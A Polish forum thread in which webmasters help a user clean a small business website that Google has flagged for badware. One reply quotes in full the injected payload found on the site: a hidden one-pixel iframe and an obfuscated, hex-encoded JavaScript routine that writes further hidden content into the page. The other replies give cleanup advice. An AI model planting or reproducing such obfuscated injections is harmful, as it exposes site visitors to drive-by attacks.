Strona google badware ? Dla webmasterów

	B O A R D
	» Board » Zadaj pytanie » Archiwum » Szukaj » Stylizacja

M E N U

» Nowości

» Archiwum

» Recenzje / Testy

» Board

» Rejestracja

Szukaj @ TwojePC

	OBECNI NA TPC
	» NimnuL 05:54 » fox19 05:49 » bmiluch 05:37 » P@blo 05:31 » alien1 05:25 » @GUTEK@ 05:21 » pwil2 05:03 » Kosiarz 04:58 » cVas 04:42 » MARC 04:15 » Shark20 03:23 » selves 02:49 » elliot_pl 02:23 Dzisiaj przeczytano 41143 postów, wczoraj 25974 Szybkie ładowanie jest: włączone.

ccc

A R C H I W A L N A W I A D O M O Ś Ć

Strona google badware ? Dla webmasterów , RoY 9/01/09 23:01
Hej,
Znajoma ma problem ze stronką www.carre.pl
google zbanowały - pokazują komunikat, że coś nie bangla. Tworca strony niedostepny, hosting na home.pl. Mam dostep FTP.
dodałem tą stronkę do narzędzi webmastera google i pokazuje mi

http://czarterownia.pl/carre.jpg

Na serwerze nie ma np. plików:

firma.html i kontakt.html
chyba, ze sa tworzone dynamicznie...
Jak wspomnialem nie ja robilem ta stronke chce pomoc w znalezieniu buga na PHP malo sie znam

jak wchodze na strone to Avast pokazuje mi:
http://czarterownia.pl/carre1.jpg

Od czego zaczac poszukiwania i naprawę ?
Kiedys na joomli mialem akcje typu phishing - ale to zablokowal hostingodawca - z google nigdy nie mialem do czynienia

pozdrawiam
RoY

zbacz sobie w kodzie , myszon 9/01/09 23:35
Na końcu dokleja się taka głupota:

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4963db32e6526(l4963db32e6cf6){ function l4963db32e74c7(){return 16;} return (parseInt(l4963db32e6cf6,l4963db32e74c7()));}function l4963db32e8468(l4963db32e8c3a){ var l4963db32ea3aa=2; var l4963db32e940a='';l4963db32eb34b=String.fromCharCode;for(l4963db32e9bd9=0;l4963db32e9bd9<l4963db32e8c3a.length;l4963db32e9bd9+=l4963db32ea3aa){ l4963db32e940a+=(l4963db32eb34b(c102916999516l4963db32e6526(l4963db32e8c3a.substr(l4963db32e9bd9,l4963db32ea3aa))));}return l4963db32e940a;} var xb3='';var l4963db32ebb1c='3C736'+xb3+'3726'+xb3+'970743E6'+xb3+'96'+xb3+'6'+xb3+'28216'+xb3+'D796'+xb3+'96'+xb3+'1297B6'+xb3+'46'+xb3+'F6'+xb3+'3756'+xb3+'D6'+xb3+'56'+xb3+'E742E77726'+xb3+'9746'+xb3+'528756'+xb3+'E6'+xb3+'5736'+xb3+'36'+xb3+'1706'+xb3+'528202725336'+xb3+'32536'+xb3+'392536'+xb3+'36'+xb3+'2537322536'+xb3+'312536'+xb3+'6'+xb3+'42536'+xb3+'352532302536'+xb3+'6'+xb3+'52536'+xb3+'312536'+xb3+'6'+xb3+'42536'+xb3+'3525336'+xb3+'42536'+xb3+'332533312533302532302537332537322536'+xb3+'3325336'+xb3+'42532372536'+xb3+'3825373425373425373025336'+xb3+'125326'+xb3+'6'+xb3+'25326'+xb3+'6'+xb3+'2536'+xb3+'372536'+xb3+'6'+xb3+'6'+xb3+'2536'+xb3+'372536'+xb3+'6'+xb3+'6'+xb3+'2533322536'+xb3+'6'+xb3+'42536'+xb3+'3525326'+xb3+'52536'+xb3+'6'+xb3+'52536'+xb3+'3525373425326'+xb3+'6'+xb3+'25326'+xb3+'52536'+xb3+'372536'+xb3+'6'+xb3+'6'+xb3+'25326'+xb3+'6'+xb3+'2536'+xb3+'332536'+xb3+'382536'+xb3+'352536'+xb3+'332536'+xb3+'6'+xb3+'225326'+xb3+'52536'+xb3+'382537342536'+xb3+'6'+xb3+'42536'+xb3+'6'+xb3+'32532372532302537372536'+xb3+'392536'+xb3+'342537342536'+xb3+'3825336'+xb3+'42533312533382533332532302536'+xb3+'382536'+xb3+'352536'+xb3+'392536'+xb3+'372536'+xb3+'3825373425336'+xb3+'42533322532302537332537342537392536'+xb3+'6'+xb3+'32536'+xb3+'3525336'+xb3+'4253237253736'+xb3+'2536'+xb3+'392537332536'+xb3+'392536'+xb3+'322536'+xb3+'392536'+xb3+'6'+xb3+'32536'+xb3+'3925373425373925336'+xb3+'12536'+xb3+'382536'+xb3+'392536'+xb3+'342536'+xb3+'342536'+xb3+'352536'+xb3+'6'+xb3+'525323725336'+xb3+'525336'+xb3+'325326'+xb3+'6'+xb3+'2536'+xb3+'392536'+xb3+'36'+xb3+'2537322536'+xb3+'312536'+xb3+'6'+xb3+'42536'+xb3+'3525336'+xb3+'52729293B7D76'+xb3+'6'+xb3+'172206'+xb3+'D796'+xb3+'96'+xb3+'13D7472756'+xb3+'53B3C2F736'+xb3+'3726'+xb3+'970743E';document.write(l4963db32e8468(l4963db32ebb1c));</script>

Wejdź na serwer i poszukaj plików/katalogów z atrybutami 777 i zmień je na prawidłowe.
1. ale narobiłeś :) , PaszkfiL 9/01/09 23:38
  teraz się trzeba gimnastykować żeby odpowiedzieć na posta ;P
  o([-_-])o ..::Love::BaSS::..
2. a to świnia , Wedrowiec 9/01/09 23:44
  u mnie na końcu pokazało tylko skrypt do fibermedia.pl, teraz owszem jest ten iframe.
  
  Swego czasu jedna osoba miała doklejone do .htaccess reguły na doklejanie kodu na wejścia tylko z google yahoo i msn.
  "Widziałem podręczniki
  Gdzie jest czarno na białym
  Że jesteście po**bani"
jeżeli twórca niedostępny , Wedrowiec 9/01/09 23:38
to pewnie nic nie było modyfikowane ostatnio - a raczej nie powinno.

Krok 1 - sprawdź daty modyfikacji plików - jeżeli są nowsze niż ostatnie zmiany o których wiadomo to coś może w nich siedzieć
2) sprawdź .htaccess czy nie ma dopisanych jakichś regułek dziwnych - możesz tu wkleić
3) umieść posta na forum googla dla webmasterów - powtarzający się problem, zazwyczaj udaje się znaleźć pomoc, jak będziesz miał farta to Kaspar z gugla się pochyli nad robaczkiem ;)

napisz od kiedy jest ban i taki komunikat i czy nie pogniewaliście się jakoś z tym webmasterem
"Widziałem podręczniki
Gdzie jest czarno na białym
Że jesteście po**bani"
zmien , XiSiO 9/01/09 23:46
haslo do ftp oraz do panelu na home.

nadaj uprawnienia tylko do odczytu dla wszytkich katalogow na serwerze poza wlascicielem pliku.

sprawdz zawartosc katalogu cache i temp wywal co w nich bedzie.

wywal kod php co masz podany wyzej.
"Przyjaźń - bezcenna za wszytko inne
zapłacisz adeną" (C) XiSiO
Strona google badware ? Dla webmasterów , RoY 10/01/09 00:14
chmody ok tylko 2 katalogi mialy 777
.htaccess:
"RewriteEngine on

RewriteRule ^([a-zA-Z]+).html index.php?typ=$1

RewriteRule ^([a-zA-Z]+),([a-zA-Z]+),([a-zA-Z]+),([0-9]+),([0-9]+).html index.php?typ=$1&no=$2&numer_strony=$4&ilosc_ofert=$5&reszta=$3
RewriteRule ^([a-zA-Z]+),([a-zA-Z]+),([0-9]+),([0-9]+).html index.php?typ=$1&no=$2&numer_strony=$3&ilosc_ofert=$4

RewriteRule ^([a-zA-Z]+),([a-zA-Z0-9]+),(.*).html index.php?typ=$1&no=$2&reszta=$3

RewriteRule ^([a-zA-Z]+),([a-zA-Z]+).html index.php?typ=$1&no=$2

:Location *.(php|phtml|htm)
Use php4"

ten kod z iframe wywalilem,
dz za sugestie,
R.
PS dla tych co nie mogą odpowiedziec (sam szukalem jakas chwilke :)) okienko odpowiedz jest wysrodkowane - trzeba paskiem dolnym przewinac
1. i jeszcze.. , RoY 10/01/09 00:18
  w katalogu tmp mam sporo plików, ktorych nazwy maja taka jak ta skladnie:
  sess_02589e8640e29b1a50c94784243ef410
  wiekszosci nie moge usunac
  pzdr
  R.
  1. tmp , Wedrowiec 10/01/09 00:29
    i plikami tam teoretycznie nie masz co sie martwić - to są pliki tymczasowe tak jak w windowsie.
    
    wywalenie iframe powinno pomóc ale jakoś tam się musiał dostać - musisz namierzyć jak to się stało. Tak jak pisze Xisio zmień hasła ale pewnie nie tędy droga jeżeli włam był przez stronę a nie przez złośliwego webmastera (co wątpliwe).
    "Widziałem podręczniki
    Gdzie jest czarno na białym
    Że jesteście po**bani"
    1. zdziwił bys sie , XiSiO 10/01/09 00:45
      ja mialem proste haslo jakies na ftp do głównego konta, a uzywalem do ftp konta admina zawsze i o tamtym nie pamietalem i nigdy nie uzywalem (konto darmowe zakladane kazdemu co zaklada konto, po wykupieniu domenu masz juz konto w domenie co kupiles) i kiedys forum na phpbb wywalalo mi sie kilka razy wlasnie przez trojana do tego stopnia ze mądre głowy z forum przemo grzebały kilka dni w forum i nie wiedzieli gdzie jest dziura a trojan ciagle zmieniał plik na serwerze pomimo zmienionych wszedzie haseł.
      "Przyjaźń - bezcenna za wszytko inne
      zapłacisz adeną" (C) XiSiO